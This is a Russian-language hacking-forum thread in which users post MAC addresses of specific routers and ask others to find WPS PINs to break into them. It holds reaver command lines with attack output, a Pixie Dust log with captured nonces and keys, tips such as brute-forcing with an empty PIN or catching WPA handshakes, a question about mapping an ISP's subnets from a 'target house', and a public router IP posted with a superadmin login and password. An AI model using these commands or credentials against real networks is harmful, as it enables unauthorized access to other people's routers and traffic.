ПОМОЩЬ в определения WPS Pin для роутеров

wifiphisher
airgeddon

 

Помогите, пожалуйста, узнать пины :
D4:6E:0E:A4:B2:5E
00:34:FE:49:470
Пины из базы не подходят

 

Здравствуйте, помогите пожалуйста найти pin
Провайдер: похоже Ростелеком
Модель: ZTE h118n
MAC: 70-2E-22-67-50-E4

Пробовал перебор reaver, WSC NACK не приходит, подбор идет, но зацикливается на 99.9%
reaver -i mon0 -c 4 -b 70:2E:22:67:50:E4 -vv -S
[+] Received beacon from 70:2E:22:67:50:E4
[+] Vendor: RealtekS
[+] Trying pin "12345670"
[+] Associated with 70:2E:22:67:50:E4 (ESSID: RT-WiFi)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin "00005678"
[+] Associated with 70:2E:22:67:50:E4 (ESSID: RT-WiFi)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred


Добавлял опцию -n и -N

reaver -i mon0 -c 4 -b 70:2E:22:67:50:E4 -vv -S -N -n
[+] Vendor: RealtekS
[+] Trying pin "12345670"
[+] Associated with 70:2E:22:67:50:E4 (ESSID: RT-WiFi)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "12345670"


Без N

reaver -i mon0 -c 4 -b 70:2E:22:67:50:E4 -vv -S -n
[+] Trying pin "12345670"
[+] Associated with 70:2E:22:67:50:E4 (ESSID: RT-WiFi)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"

 

Это TP-Link, даже не пытайтесь. Ловите ХШ.

Либо 00000000, либо пустой пин, либо pixiewps.

Долбите его пустым пином.

Router Scan-way: https://forum.antichat.ru/posts/4133694
Reaver-way: https://forum.antichat.ru/posts/4148723

 

Спасибо, помогло!!!

 

есть доступ к одному из роутеров в целевом доме. как определить диапазоны (подсети) ip по данному провайдеру?
трассировка выдает:

Code:

tracert 8.8.8.8

Трассировка маршрута к google-public-dns-a.google.com [8.8.8.8]
с максимальным числом прыжков 30:

Spoiler

Code:

1     5 ms    10 ms    10 ms  192.168.1.1
  2    16 ms     8 ms     9 ms  100.101.0.1
  3     7 ms     5 ms     9 ms  213.59.232.250
  4    22 ms    19 ms    24 ms  100.64.4.1
  5    29 ms     *        *     87.226.181.89
  6    22 ms    22 ms    18 ms  72.14.222.172
  7    20 ms    25 ms    20 ms  216.239.40.69
  8    22 ms    21 ms    21 ms  72.14.233.95
  9    16 ms    16 ms    19 ms  google-public-dns-a.google.com [8.8.8.8]

Трассировка завершена.

 

100.101.XXX.XXX скорее всего локальный ростелекомовский пул вашего города(области).
Хотя и 100.64.XXX.XXX интересно бы понаблюдать(100.64.0.0/16).

 

04:8D:38:4F:A2:EA ПОМОГИТЕ подобрать WPS, с базы ни один пин не подходить+у роутера есть блокировка на неудачные попытки ввода, закрывается навсегда или пока не перезапустят роутер. с использованием пина 86250320 выдаёт вот это.

1. Audit started.
2. Associating with AP...
   [+] Associated successfully.
3. Warning: AP is locked.
4. Trying pin "86250320"...
5. Sending EAPOL Start...
6. Received Identity Request.
7. Sending Identity Response...
8. Received WPS Message M1.
9. E-Nonce: 1CBA00F04C22A67C40E123BE34E121DC
10. PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
11. Manufacturer: Realtek Semiconductor Corp.
12. Model Name: RTL8xxx
13. Model Number: EV-2010-09-20
14. Serial Number: 123456789012347
15. Device Name: RTK_AP
16. Sending WPS Message M2...
17. R-Nonce: 5308CEEA46666A26E2161371F4E02E1C
18. PKR: 08B41B8079CCD7A57BCC3E11D1989339F94B4F7380E75A74182FD81CE3A6E380D2753CC8C9F4F0612B38466698C965525ADC487A695F5D9A1A8D40762EC2A286863E6F28756094574BD993E31FA57761B2A0012924909B8AD788BAA1092C14078E121EC8A761B8C8B6E185AE6FE9C27858D8CF6EB28D3A75A8E3F689E6907CB1CEB40BA4A2BB4F6DCCE713909453A29C2D4AF36DE9E951E762267086387DCFD9C5865538C37584C2D938AEB5EE495601809D6B459D160D93CCCD6EAA56AF5182
19. AuthKey: 38F59532EDA02E95F721E5ED8E4E7A5990DE71666EEC29D38311FB38DB643307
20. Received WSC NACK.
    [-] Error: Setup is locked.
21. Sending WPS Message M4...
22. Received WSC NACK.
    [-] Unknown error FFFF.
23. Sending WSC NACK...
24. EAP session closed.
    [-] Not enough data for Pixie Dust attack.
25. Audit stopped.

 

Ничего не выйдет, уже закрылась.

 

Помогите пожалуйста подобрать пин к роутерам
78:94:b4:99:9d:d1
4C-AC-0A-70-B7-64
78:94:b4:99:9d:d1
70:9f:2d:d9:dd:9a

 

Есть ли возможность как то эти два роутера прощупать? )

tp-link tl-wr1043nd 2.0
и
tp-link tl-wr740n 4.0

заранее сппсибо..

 

Пока только рукопожатия. PIN-генерация пока не выяснена. (не удивлюсь, если связана с серийником итд)
Хендшейк ловить, и выкладывать в тему перебора пробовали?
MAC-и на 3WiFi прикидывали?

 

Хендшейки ловил, не смог подобрать.

последней бетой роутерскана пытался мучать их ... не отдают ключи...

 

Ну.. всегда есть люди, прикладные знания которых, в определённых областях выше ваших.
Не хочу указывать Ники(это и так ясно).. Вы точно пробовали сюда выкладывать валидные данные: https://forum.antichat.ru/threads/perebor-i-podbor-parolja-wi-fi-wpa2-2017.435763/
?

 

Други помогите! ec:43:f6:03:e3:44 keenetic-9441

 

Здравствуйте. Помогите пожалуйста! Linksys Router WRT54G2. 00:23:69:4C:B0:08

 

Дайте пару советов для перебора пина на ZTE h118n и h108n у них прошивки подобные думаю разницы нет.
И что за "долбить пустым пином"?

 

reaver -i wlanXmon -b XX:XX:XX:XX:XX:XX -vv -c X -p "" -n

 

и как вот например отсюда выдрать пароль и логин на инет http://92.126.208.129/
superadmin:Fn@ztE118zTE

 

Ты заболел?